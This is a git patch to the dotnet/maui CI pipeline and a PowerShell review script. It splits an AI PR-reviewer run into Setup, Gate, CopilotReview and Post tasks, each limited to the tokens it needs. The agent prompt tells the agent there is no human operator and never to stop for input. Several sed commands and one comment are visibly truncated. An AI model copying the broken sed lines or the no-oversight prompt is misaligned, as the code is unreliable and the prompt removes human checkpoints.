From 7d87222f7808e73fce32c5f8544fe2305e5481b8 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Fri, 22 May 2026 20:48:42 +0200 Subject: [PATCH 01/34] [CI] Refactor ci-copilot pipeline: scope env vars per task MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Split the monolithic 'Run PR Reviewer Agent' bash task into 4 sequential tasks, each with exactly the env vars it needs: Task 1 (Setup): GH_TOKEN only — branch checkout, PR merge Task 2 (Gate): NO tokens — dotnet build/test, gate verification Task 3 (CopilotReview): COPILOT_GITHUB_TOKEN — expert review + try-fix Task 4 (Post): GH_TOKEN only — comments, labels, summary Review-PR.ps1 gains -Phase (Setup|Gate|CopilotReview|Post) and -TrustedScriptsDir parameters so each pipeline task invokes a single phase. Backward-compatible: omitting -Phase runs all steps sequentially. Security improvements: - persistCredentials: false (credentials no longer available to all tasks) - Removed gh auth login step (GH_TOKEN used directly as env var) - --secret-env-vars strips tokens from copilot subprocess environments - Trusted scripts copied once in Setup, reused by all phases - PRNumber type changed to 'number' for AzDO parameter validation Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 228 +++++++++++++++++++++++--------- eng/pipelines/ci-copilot.yml | 238 +++++++++++++++++++++------------- 2 files changed, 312 insertions(+), 154 deletions(-) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 3bce923e2ddc..352934935b61 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -50,6 +50,13 @@ param( [ValidateSet('android', 'ios', 'windows', 'maccatalyst', 'catalyst')] [string]$Platform, + [Parameter(Mandatory = $false)] + [ValidateSet('Setup', 'Gate', 'CopilotReview', 'Post')] + [string]$Phase, + + [Parameter(Mandatory = $false)] + 
[string]$TrustedScriptsDir, + [Parameter(Mandatory = $false)] [switch]$UseCurrentBranch, @@ -63,6 +70,13 @@ param( $ErrorActionPreference = 'Stop' if ($LogFile) { + # When running with -Phase, each phase is a separate process writing to the same log. + # Append a phase suffix so phases don't overwrite each other's logs. + if ($Phase) { + $logExt = [System.IO.Path]::GetExtension($LogFile) + $logBase = $LogFile.Substring(0, $LogFile.Length - $logExt.Length) + $LogFile = "${logBase}_${Phase}${logExt}" + } $logDir = Split-Path $LogFile -Parent if ($logDir -and -not (Test-Path $logDir)) { New-Item -ItemType Directory -Path $logDir -Force | Out-Null @@ -73,6 +87,28 @@ if ($LogFile) { $RepoRoot = git rev-parse --show-toplevel 2>$null if (-not $RepoRoot) { Write-Error "Not in a git repository"; exit 1 } +# ─── Phase routing ───────────────────────────────────────────────────────────── +# When -Phase is specified, run ONLY that phase. This enables the 4-task AzDO +# split where each task calls Review-PR.ps1 with a different phase, each with +# exactly the secrets it needs in its env: block. +# +# Task 1 (Setup): env: GH_TOKEN. No dotnet, no copilot. +# Task 2 (Gate): env: . dotnet build/test only. +# Task 3 (CopilotReview): env: COPILOT_GITHUB_TOKEN. copilot → dotnet (stripped). +# Task 4 (Post): env: GH_TOKEN. Trusted scripts, no dotnet. +# +# When -Phase is NOT specified, all steps run sequentially (backward compat for +# local development use). +$runSetup = -not $Phase -or $Phase -eq 'Setup' +$runGate = -not $Phase -or $Phase -eq 'Gate' +$runCopilotReview = -not $Phase -or $Phase -eq 'CopilotReview' +$runPost = -not $Phase -or $Phase -eq 'Post' + +# Resolve the scripts directory — use TrustedScriptsDir if provided (CI), +# otherwise use the repo's own .github/ directory (local dev). 
+$ScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts' } else { $PSScriptRoot } +$SkillsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' } else { Join-Path $PSScriptRoot '../skills' } + # ─── Banner ─────────────────────────────────────────────────────────────────── Write-Host "" Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Cyan @@ -87,7 +123,25 @@ if ($Platform) { Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Cyan Write-Host "" +# ─── Shared variables (available to all phases) ────────────────────────────── +$platformInstruction = if ($Platform) { + "**Platform for testing:** $Platform" +} else { + "**Platform for testing:** Determine from PR's affected code paths and current host OS." +} + +$autonomousRules = @" + +🚨 **AUTONOMOUS EXECUTION:** +- There is NO human operator - NEVER stop and ask for input +- On environment blockers: skip the blocked phase and continue +- Always prefer CONTINUING with partial results over STOPPING +"@ + +$reviewBranch = "pr-review-$PRNumber" + # ─── Prerequisites ──────────────────────────────────────────────────────────── +if ($runSetup) { Write-Host "📋 Checking prerequisites..." -ForegroundColor Yellow $ghVersion = gh --version 2>$null | Select-Object -First 1 @@ -104,21 +158,6 @@ $prInfo = gh pr view $PRNumber --json title,state 2>$null | ConvertFrom-Json if (-not $prInfo) { Write-Error "PR #$PRNumber not found"; exit 1 } Write-Host " ✅ PR: $($prInfo.title)" -ForegroundColor Green -# ─── Shared prompt rules ───────────────────────────────────────────────────── -$platformInstruction = if ($Platform) { - "**Platform for testing:** $Platform" -} else { - "**Platform for testing:** Determine from PR's affected code paths and current host OS." 
-} - -$autonomousRules = @" - -🚨 **AUTONOMOUS EXECUTION:** -- There is NO human operator - NEVER stop and ask for input -- On environment blockers: skip the blocked phase and continue -- Always prefer CONTINUING with partial results over STOPPING -"@ - # ═════════════════════════════════════════════════════════════════════════════ # STEP 1: Branch Setup (Create Review Branch & Cherry-Pick PR) # ═════════════════════════════════════════════════════════════════════════════ @@ -128,8 +167,6 @@ Write-Host "╔═════════════════════ Write-Host "║ STEP 1: BRANCH SETUP ║" -ForegroundColor Yellow Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Yellow -$reviewBranch = "pr-review-$PRNumber" - if ($DryRun) { if ($UseCurrentBranch) { Write-Host "[DRY RUN] Would create review branch '$reviewBranch' from current branch" -ForegroundColor Magenta @@ -275,6 +312,24 @@ if ($DryRun) { Write-Host " 📝 HEAD: $headCommit" -ForegroundColor Gray } +} # end if ($runSetup) + +# End of Setup phase — write sentinel and exit early +if ($Phase -eq 'Setup') { + # Sentinel signals to Tasks 2-4 that Setup completed successfully (PR merged). + $sentinelDir = if ($TrustedScriptsDir) { + Split-Path $TrustedScriptsDir -Parent + } else { + $d = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate" + New-Item -ItemType Directory -Force -Path $d | Out-Null + $d + } + "OK" | Set-Content (Join-Path $sentinelDir "setup-complete") -Encoding UTF8 + Write-Host "✅ Setup phase complete" -ForegroundColor Green + if ($LogFile) { Stop-Transcript -ErrorAction SilentlyContinue | Out-Null } + exit 0 +} + # ─── Helper: Parse `dotnet test --logger "console;verbosity=detailed"` ────── # Extracts per-test results (Passed/Failed/Skipped) plus failure messages and # stack traces from raw stdout. Used by STEP 3 so the AI summary comment shows @@ -467,10 +522,12 @@ function Invoke-CopilotStep { } # Use JSON output format to stream live progress of agent activity. 
+ # --secret-env-vars: defense-in-depth — strips named tokens from copilot's + # shell/MCP subprocess env even if they somehow appear (e.g., via variable groups). # Model is overridable via $env:COPILOT_REVIEW_MODEL so contributors without internal-model access # can run this script (e.g., with 'claude-opus-4.6' or 'claude-sonnet-4.6'). $copilotModel = if ($env:COPILOT_REVIEW_MODEL) { $env:COPILOT_REVIEW_MODEL } else { 'gpt-5.5' } - & copilot -p $Prompt --allow-all --output-format json --model $copilotModel 2>&1 | ForEach-Object { + & copilot -p $Prompt --allow-all --output-format json --model $copilotModel --secret-env-vars=GH_TOKEN,COPILOT_GITHUB_TOKEN,GITHUB_TOKEN 2>&1 | ForEach-Object { $line = $_.ToString() try { $event = $line | ConvertFrom-Json -ErrorAction Stop @@ -613,6 +670,8 @@ function Invoke-CopilotStep { # STEP 2: DETECT UI Test Categories (detection only — no pipeline trigger) # ═════════════════════════════════════════════════════════════════════════════ +if ($runGate) { + Write-Host "" Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Cyan Write-Host "║ STEP 2: DETECT UI TEST CATEGORIES ║" -ForegroundColor Cyan @@ -704,7 +763,7 @@ Write-Host "║ STEP 3: RUN DETECTED UI TESTS ║" - Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Cyan $uitestRunResult = "SKIPPED" -$uitestRunnerScript = Join-Path $PSScriptRoot "BuildAndRunHostApp.ps1" +$uitestRunnerScript = Join-Path $ScriptsDir "BuildAndRunHostApp.ps1" if ($uitestCategories -eq 'NONE') { Write-Host " ⏭️ Skipped — detection returned NONE (no UI-relevant changes)" -ForegroundColor DarkGray @@ -743,7 +802,7 @@ if ($uitestCategories -eq 'NONE') { # turning into "119 OneTimeSetUp timeouts" in the AI summary. 
$catLogPath = Join-Path $uitestRunOutputDir ("$cat-output.log") $catStart = Get-Date - $sharedRunner = Join-Path $PSScriptRoot "shared/Invoke-UITestWithRetry.ps1" + $sharedRunner = Join-Path $ScriptsDir "shared/Invoke-UITestWithRetry.ps1" $runResult = $null $testOutput = @() $testExitCode = -1 @@ -867,7 +926,7 @@ if ($uitestCategories -eq 'NONE') { # If $envErrHit was set above, use that — the retry loop already # detected an env error and exhausted retries. # Load shared env-error patterns (single source of truth). - $sharedPatternsScript = Join-Path $PSScriptRoot "shared/Get-EnvErrorPatterns.ps1" + $sharedPatternsScript = Join-Path $ScriptsDir "shared/Get-EnvErrorPatterns.ps1" if (Test-Path $sharedPatternsScript) { . $sharedPatternsScript $infraSignals = Get-EnvErrorPatterns @@ -1144,7 +1203,7 @@ Write-Host "║ STEP 4: REGRESSION CROSS-REFERENCE ║" -F Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Cyan $regressionOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/regression-check" -$regressionScript = Join-Path $PSScriptRoot "Find-RegressionRisks.ps1" +$regressionScript = Join-Path $ScriptsDir "Find-RegressionRisks.ps1" if (Test-Path $regressionScript) { try { & $regressionScript -PRNumber $PRNumber -OutputDir $regressionOutputDir @@ -1348,7 +1407,7 @@ New-Item -ItemType Directory -Force -Path $gateOutputDir | Out-Null # Detect tests in PR Write-Host " 🔍 Detecting tests in PR #$PRNumber..." 
-ForegroundColor Cyan -$testDetectScript = Join-Path $PSScriptRoot "shared/Detect-TestsInDiff.ps1" +$testDetectScript = Join-Path $ScriptsDir "shared/Detect-TestsInDiff.ps1" if (Test-Path $testDetectScript) { $testDetectScript = (Resolve-Path $testDetectScript).Path & pwsh -NoProfile -File $testDetectScript -PRNumber $PRNumber 2>&1 | ForEach-Object { Write-Host " $_" } @@ -1360,7 +1419,7 @@ if (Test-Path $testDetectScript) { $gatePlatform = if ($Platform) { $Platform } else { "android" } Write-Host " 🧪 Running gate on platform: $gatePlatform" -ForegroundColor Cyan -$verifyScript = [System.IO.Path]::GetFullPath((Join-Path $PSScriptRoot "../skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1")) +$verifyScript = [System.IO.Path]::GetFullPath((Join-Path $SkillsDir "verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1")) if (-not (Test-Path $verifyScript)) { Write-Host " ❌ verify-tests-fail.ps1 not found at: $verifyScript" -ForegroundColor Red # $gateExitCode = 1 ensures the switch at line ~561 produces $gateResult = "FAILED" @@ -1571,47 +1630,34 @@ $gateLogTail } } -# Post gate result as a separate PR comment -$postGateScript = Join-Path $PSScriptRoot "post-gate-comment.ps1" -if (Test-Path $postGateScript) { - try { - if ($DryRun) { - & $postGateScript -PRNumber $PRNumber -DryRun - } else { - & $postGateScript -PRNumber $PRNumber - } - } catch { - Write-Host " ⚠️ Failed to post gate comment (non-fatal): $_" -ForegroundColor Yellow - } +# Persist gate result so other phases can read it +$gateVerdictDir = if ($TrustedScriptsDir) { + Split-Path $TrustedScriptsDir -Parent } else { - Write-Host " ⚠️ post-gate-comment.ps1 not found" -ForegroundColor Yellow + $d = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate" + New-Item -ItemType Directory -Force -Path $d | Out-Null + $d } +$gateResult | Set-Content (Join-Path $gateVerdictDir "gate-result.txt") -Encoding UTF8 +Write-Host " 📄 Gate result persisted: $gateResult" -ForegroundColor 
Gray -# Apply gate result label -$gatePassLabel = "s/agent-gate-passed" -$gateFaillabel = "s/agent-gate-failed" -$gateSkipLabel = "s/agent-gate-skipped" -$allGateLabels = @($gatePassLabel, $gateFaillabel, $gateSkipLabel) +} # end if (-not $skipGateAndTryFix) -$addLabel = switch ($gateResult) { - "PASSED" { $gatePassLabel } - "SKIPPED" { $gateSkipLabel } - default { $gateFaillabel } -} -$removeLabels = $allGateLabels | Where-Object { $_ -ne $addLabel } +} # end if ($runGate) -if (-not $DryRun) { - foreach ($lbl in $removeLabels) { - gh pr edit $PRNumber --remove-label $lbl --repo dotnet/maui 2>$null | Out-Null - } - gh pr edit $PRNumber --add-label $addLabel --repo dotnet/maui 2>$null | Out-Null - if ($LASTEXITCODE -eq 0) { - Write-Host " 🏷️ Label: $addLabel" -ForegroundColor Cyan +# ─── Phase: CopilotReview ────────────────────────────────────────────────── +if ($runCopilotReview) { + +# Restore gate result from file when running in phased mode +if ($Phase -eq 'CopilotReview') { + $gateVerdictFile = Join-Path (Split-Path $TrustedScriptsDir -Parent) "gate-result.txt" + if (Test-Path $gateVerdictFile) { + $gateResult = (Get-Content $gateVerdictFile -Raw).Trim() + Write-Host " 📄 Restored gate result: $gateResult" -ForegroundColor Gray } else { - Write-Host " ⚠️ Failed to apply label $addLabel" -ForegroundColor Yellow + $gateResult = "SKIPPED" + Write-Host " ⚠️ Gate result file not found — defaulting to SKIPPED" -ForegroundColor Yellow } -} else { - Write-Host " [DRY RUN] Would set label: $addLabel" -ForegroundColor Magenta } # Restore review branch @@ -1804,7 +1850,7 @@ git checkout $reviewBranch 2>$null | Out-Null # Pre-flight (Step 6) wrote `ai-categories.md`; re-run detection now so the # unified comment reflects all three tiers before Step 7 posts. 
$aiCategoriesFile = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/uitests/ai-categories.md" -if ((Test-Path $detectScript) -and (Test-Path $aiCategoriesFile)) { +if ($detectScript -and (Test-Path $detectScript) -and (Test-Path $aiCategoriesFile)) { try { # Pass as a single string (the script declares [string]$AiCategories); # an array would not bind correctly across the pwsh -File boundary. @@ -1864,7 +1910,63 @@ if ((Test-Path $detectScript) -and (Test-Path $aiCategoriesFile)) { } } -} # END TEMP SKIP wrapper for STEP 5 (Gate) + STEP 6 (Try-Fix) — see $skipGateAndTryFix above +} # end if ($runCopilotReview) + +# ─── Phase: Post ──────────────────────────────────────────────────────────── +if ($runPost) { + +# Restore gate result from file when running in phased mode +if ($Phase -eq 'Post') { + $gateVerdictFile = Join-Path (Split-Path $TrustedScriptsDir -Parent) "gate-result.txt" + if (Test-Path $gateVerdictFile) { + $gateResult = (Get-Content $gateVerdictFile -Raw).Trim() + } else { + $gateResult = "SKIPPED" + } +} + +# ─── Gate posting (moved here so only the Post task needs GH_TOKEN) ────── +$postGateScript = Join-Path $ScriptsDir "post-gate-comment.ps1" +if (Test-Path $postGateScript) { + try { + if ($DryRun) { + & $postGateScript -PRNumber $PRNumber -DryRun + } else { + & $postGateScript -PRNumber $PRNumber + } + } catch { + Write-Host " ⚠️ Failed to post gate comment (non-fatal): $_" -ForegroundColor Yellow + } +} else { + Write-Host " ⚠️ post-gate-comment.ps1 not found" -ForegroundColor Yellow +} + +# Apply gate result label +$gatePassLabel = "s/agent-gate-passed" +$gateFaillabel = "s/agent-gate-failed" +$gateSkipLabel = "s/agent-gate-skipped" +$allGateLabels = @($gatePassLabel, $gateFaillabel, $gateSkipLabel) + +$addLabel = switch ($gateResult) { + "PASSED" { $gatePassLabel } + "SKIPPED" { $gateSkipLabel } + default { $gateFaillabel } +} +$removeLabels = $allGateLabels | Where-Object { $_ -ne $addLabel } + +if (-not $DryRun) { + foreach 
($lbl in $removeLabels) { + gh pr edit $PRNumber --remove-label $lbl --repo dotnet/maui 2>$null | Out-Null + } + gh pr edit $PRNumber --add-label $addLabel --repo dotnet/maui 2>$null | Out-Null + if ($LASTEXITCODE -eq 0) { + Write-Host " 🏷️ Label: $addLabel" -ForegroundColor Cyan + } else { + Write-Host " ⚠️ Failed to apply label $addLabel" -ForegroundColor Yellow + } +} else { + Write-Host " [DRY RUN] Would set label: $addLabel" -ForegroundColor Magenta +} # ═════════════════════════════════════════════════════════════════════════════ # STEP 7: Post AI Summary Comment (direct script invocation) @@ -1877,7 +1979,7 @@ Write-Host "╔═════════════════════ Write-Host "║ STEP 7: POST AI SUMMARY ║" -ForegroundColor Magenta Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Magenta -$summaryScriptsDir = Join-Path $RepoRoot ".github/scripts" +$summaryScriptsDir = $ScriptsDir if ($env:DEFER_COMMENT_TO_STAGE3 -eq 'true') { Write-Host " ⏭️ Deferred to Stage 3 (DEFER_COMMENT_TO_STAGE3=true)" -ForegroundColor Gray @@ -2064,7 +2166,7 @@ Write-Host "╔═════════════════════ Write-Host "║ STEP 8: APPLY LABELS ║" -ForegroundColor Blue Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Blue -$labelHelperPath = Join-Path $RepoRoot ".github/scripts/shared/Update-AgentLabels.ps1" +$labelHelperPath = Join-Path $ScriptsDir "shared/Update-AgentLabels.ps1" if (Test-Path $labelHelperPath) { try { . 
$labelHelperPath @@ -2077,6 +2179,8 @@ if (Test-Path $labelHelperPath) { Write-Host " ⚠️ Label helper not found — skipping" -ForegroundColor Yellow } +} # end if ($runPost) + # ═════════════════════════════════════════════════════════════════════════════ # Cleanup # ═════════════════════════════════════════════════════════════════════════════ diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 0f5e04b72231..890fe6d59942 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -12,8 +12,7 @@ pr: none # Not triggered by PRs parameters: - name: PRNumber displayName: 'Pull Request Number' - type: string - default: '' + type: number - name: Platform displayName: 'Target Platform' @@ -80,7 +79,10 @@ stages: steps: - checkout: self fetchDepth: 0 - persistCredentials: true + persistCredentials: false + # persistCredentials is false — tasks that need GitHub access + # (Setup, Post) use GH_TOKEN env var instead. This limits the + # blast radius: Gate and CopilotReview tasks cannot push to the repo. # Validate Parameters # PRNumber is received via env var to avoid compile-time shell injection. @@ -376,24 +378,11 @@ stages: echo "GitHub CLI ready" displayName: 'Install GitHub CLI' - - bash: | - echo "Authenticating with GitHub CLI..." - if [ -z "$GH_TOKEN" ]; then - echo "##vso[task.logissue type=error]GH_TOKEN env var (from pipeline variable GH_COMMENT_TOKEN) is not set. Please configure the pipeline variable." - exit 1 - fi - gh auth status - if [ $? -ne 0 ]; then - echo "$GH_TOKEN" | gh auth login --with-token 2>/dev/null || true - if ! gh auth status; then - echo "##vso[task.logissue type=error]GitHub CLI authentication failed" - exit 1 - fi - fi - echo "GitHub CLI authenticated successfully" - displayName: 'Authenticate GitHub CLI' - env: - GH_TOKEN: $(GH_COMMENT_TOKEN) + # NOTE: Removed `gh auth login` step. 
With the phased task design, + # GH_TOKEN is passed as an env var only to Setup and Post tasks, and + # `gh` uses GH_TOKEN directly without needing `gh auth login`. This + # avoids persisting credentials in the agent's gh auth store where + # Gate and CopilotReview tasks could access them. - bash: | echo "Installing GitHub Copilot CLI..." @@ -575,16 +564,16 @@ stages: timeoutInMinutes: 6 retryCountOnTaskFailure: 2 + # ───────────────────────────────────────────────────────── + # Task 1 — SETUP: symlink copilot, git config, env prep, + # copy trusted scripts, invoke Review-PR.ps1 -Phase Setup + # env: GH_TOKEN (for branch checkout / PR merge) + # ───────────────────────────────────────────────────────── - bash: | - echo "Running Copilot PR Reviewer Agent via Review-PR.ps1..." - echo "Reviewing PR #${{ parameters.PRNumber }}..." + echo "═══ TASK 1: SETUP ═══" + # Ensure copilot CLI is accessible to pwsh subprocess. - # npm global install on Linux goes to UseNode@1 toolcache path which may not - # be on PATH inside pwsh even when exported from bash. Create a symlink in - # /usr/local/bin (Unix) or verify PATH (Windows). if [[ "$(uname -o 2>/dev/null || uname -s)" == *"Msys"* ]] || [[ "$(uname -o 2>/dev/null || uname -s)" == *"Windows"* ]] || [[ "$(uname -o 2>/dev/null || uname -s)" == *"MINGW"* ]]; then - # Windows (Git Bash): npm global bin is usually already on PATH - echo "Windows detected — verifying copilot is on PATH..." COPILOT_PATH=$(which copilot 2>/dev/null || true) echo "copilot location: ${COPILOT_PATH:-not found}" if [ -z "$COPILOT_PATH" ]; then @@ -592,7 +581,6 @@ stages: exit 1 fi else - # Linux/macOS: symlink to /usr/local/bin COPILOT_PATH=$(which copilot 2>/dev/null || find /opt/hostedtoolcache/node -name copilot -type f 2>/dev/null | head -1) if [ -n "$COPILOT_PATH" ] && [ ! 
-f /usr/local/bin/copilot ]; then sudo ln -sf "$COPILOT_PATH" /usr/local/bin/copilot @@ -605,84 +593,144 @@ stages: exit 1 fi fi - # Verify pwsh can find it pwsh -NoProfile -c 'Write-Host "pwsh sees copilot at: $(Get-Command copilot -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Source)"' - - # Configure git identity (required for merge operations on self-hosted agents) + + # Configure git identity git config user.email "copilot-ci@microsoft.com" git config user.name "Copilot CI" - echo "Git identity configured" - - # Create Directory.Build.Override.props to skip Xcode version check (not needed on Windows) + + # Create Directory.Build.Override.props cp Directory.Build.Override.props.in Directory.Build.Override.props if [[ "$(uname)" == "Linux" ]]; then sed -i 's|| false\n|' Directory.Build.Override.props elif [[ "$(uname)" == "Darwin" ]]; then sed -i '' 's|| false\n|' Directory.Build.Override.props else - # Windows (Git Bash) — GNU sed, same as Linux sed -i 's|| false\n|' Directory.Build.Override.props fi - - # Create artifacts directory for Copilot outputs + + # Create artifacts directory mkdir -p $(Build.ArtifactStagingDirectory)/copilot-logs - - # Invoke the PR reviewer using our PowerShell script - # The script will merge the PR into the current branch - # -PostSummaryComment and -RunFinalize handle posting comments - echo "Review platform: ${{ parameters.Platform }}" - + + # Copy trusted scripts from the checked-out commit so later tasks + # (which may be on a merged/modified worktree) use the same .github/ + # files that were reviewed and approved on main. 
+ TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github" + mkdir -p "$TRUSTED" + cp -r .github/scripts "$TRUSTED/scripts" + cp -r .github/skills "$TRUSTED/skills" + echo "Trusted scripts copied to $TRUSTED" + + # Run Setup phase (branch checkout + PR merge) set +e - pwsh -NoProfile .github/scripts/Review-PR.ps1 -PRNumber "${PARAM_PR_NUMBER}" -Platform "${{ parameters.Platform }}" -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" - COPILOT_EXIT_CODE=$? + pwsh -NoProfile .github/scripts/Review-PR.ps1 \ + -PRNumber "${PARAM_PR_NUMBER}" \ + -Platform "${{ parameters.Platform }}" \ + -Phase Setup \ + -TrustedScriptsDir "$TRUSTED" \ + -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" + SETUP_EXIT=$? set -e - - echo "Review-PR.ps1 exit code: $COPILOT_EXIT_CODE" - - # Terminate any orphaned copilot CLI processes that could hold this step's - # stdout fd open and prevent the bash step from exiting. - # Only target processes whose command line includes the copilot CLI path. - echo "Cleaning up orphaned copilot processes..." - SELF_PID=$$ - for proc in $(pgrep -f "[c]opilot" 2>/dev/null || true); do - if [ -n "$proc" ] && [ "$proc" != "$SELF_PID" ]; then - PROC_CMD=$(ps -p "$proc" -o args= 2>/dev/null || true) - if echo "$PROC_CMD" | grep -q "copilot"; then - echo " Stopping copilot process $proc: $PROC_CMD" - kill "$proc" 2>/dev/null || true - fi - fi - done - - # Copy any Copilot session files (bash — works on Linux/macOS) - if [ -d "$HOME/.copilot" ]; then - echo "Copying Copilot session state..." 
- cp -r "$HOME/.copilot" $(Build.ArtifactStagingDirectory)/copilot-logs/copilot-session-state || true - fi - - # Check for failure indicators in output - if [ $COPILOT_EXIT_CODE -ne 0 ]; then - echo "##vso[task.logissue type=error]Review-PR.ps1 exited with code $COPILOT_EXIT_CODE" - # Don't exit yet - let artifacts be published first + + if [ $SETUP_EXIT -ne 0 ]; then + echo "##vso[task.logissue type=error]Setup phase failed with exit code $SETUP_EXIT" echo "##vso[task.setvariable variable=CopilotFailed]true" fi - - # Check output for common failure patterns - if grep -qi "error\|failed\|exception" $(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md 2>/dev/null; then - if grep -qi "simulator.*not\|emulator.*not\|workload.*not\|sdk.*not found" $(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md 2>/dev/null; then - echo "##vso[task.logissue type=warning]Copilot encountered environment issues. Check artifacts for details." - fi + name: RunSetup + displayName: 'Task 1: Setup (branch + merge)' + env: + GH_TOKEN: $(GH_COMMENT_TOKEN) + PARAM_PR_NUMBER: ${{ parameters.PRNumber }} + + # ───────────────────────────────────────────────────────── + # Task 2 — GATE: UI detection, test runs, regression, + # gate verification. NO tokens — only dotnet/build tools. + # ───────────────────────────────────────────────────────── + - bash: | + echo "═══ TASK 2: GATE ═══" + TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github" + + set +e + pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" \ + -PRNumber "${PARAM_PR_NUMBER}" \ + -Platform "${{ parameters.Platform }}" \ + -Phase Gate \ + -TrustedScriptsDir "$TRUSTED" \ + -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" + GATE_EXIT=$? 
+ set -e + + if [ $GATE_EXIT -ne 0 ]; then + echo "##vso[task.logissue type=warning]Gate phase exited with code $GATE_EXIT" + echo "##vso[task.setvariable variable=GateFailed]true" fi - - echo "Review output saved to $(Build.ArtifactStagingDirectory)/copilot-logs/" - name: RunReview # referenceable name so the new RunDeepUITests / UpdateAISummaryComment stages can read this step's output variables (detectedCategories, detectedPlatform) via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunReview.']) - displayName: 'Run PR Reviewer Agent' + name: RunGate + displayName: 'Task 2: Gate (test verification)' + env: + PARAM_PR_NUMBER: ${{ parameters.PRNumber }} + + # ───────────────────────────────────────────────────────── + # Task 3 — COPILOT REVIEW: expert review + try-fix. + # env: COPILOT_GITHUB_TOKEN (for copilot agent). + # NO GH_TOKEN — the agent can't push or post comments. + # ───────────────────────────────────────────────────────── + - bash: | + echo "═══ TASK 3: COPILOT REVIEW ═══" + TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github" + + echo "Review platform: ${{ parameters.Platform }}" + + set +e + pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" \ + -PRNumber "${PARAM_PR_NUMBER}" \ + -Platform "${{ parameters.Platform }}" \ + -Phase CopilotReview \ + -TrustedScriptsDir "$TRUSTED" \ + -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" + REVIEW_EXIT=$? 
+ set -e + + if [ $REVIEW_EXIT -ne 0 ]; then + echo "##vso[task.logissue type=error]CopilotReview phase failed with exit code $REVIEW_EXIT" + echo "##vso[task.setvariable variable=CopilotFailed]true" + fi + name: RunReview + displayName: 'Task 3: Copilot Review (expert review + try-fix)' env: COPILOT_GITHUB_TOKEN: $(COPILOT_TOKEN) - GH_TOKEN: $(GH_COMMENT_TOKEN) DEVICE_UDID: $(DEVICE_UDID) PARAM_PR_NUMBER: ${{ parameters.PRNumber }} COMMENTS_VIA_FILE: "true" + + # ───────────────────────────────────────────────────────── + # Task 4 — POST: gate comment, AI summary, labels. + # env: GH_TOKEN (for posting comments). + # ───────────────────────────────────────────────────────── + - bash: | + echo "═══ TASK 4: POST ═══" + TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github" + + set +e + pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" \ + -PRNumber "${PARAM_PR_NUMBER}" \ + -Platform "${{ parameters.Platform }}" \ + -Phase Post \ + -TrustedScriptsDir "$TRUSTED" \ + -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" + POST_EXIT=$? + set -e + + if [ $POST_EXIT -ne 0 ]; then + echo "##vso[task.logissue type=error]Post phase failed with exit code $POST_EXIT" + echo "##vso[task.setvariable variable=CopilotFailed]true" + fi + + echo "Review output saved to $(Build.ArtifactStagingDirectory)/copilot-logs/" + name: RunPost # referenceable name so the new RunDeepUITests / UpdateAISummaryComment stages can read this step's output variables (detectedCategories, detectedPlatform) via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.']) + displayName: 'Task 4: Post (comments + labels)' + env: + GH_TOKEN: $(GH_COMMENT_TOKEN) + PARAM_PR_NUMBER: ${{ parameters.PRNumber }} DEFER_COMMENT_TO_STAGE3: "true" # Copy review artifacts into the CopilotLogs staging dir. 
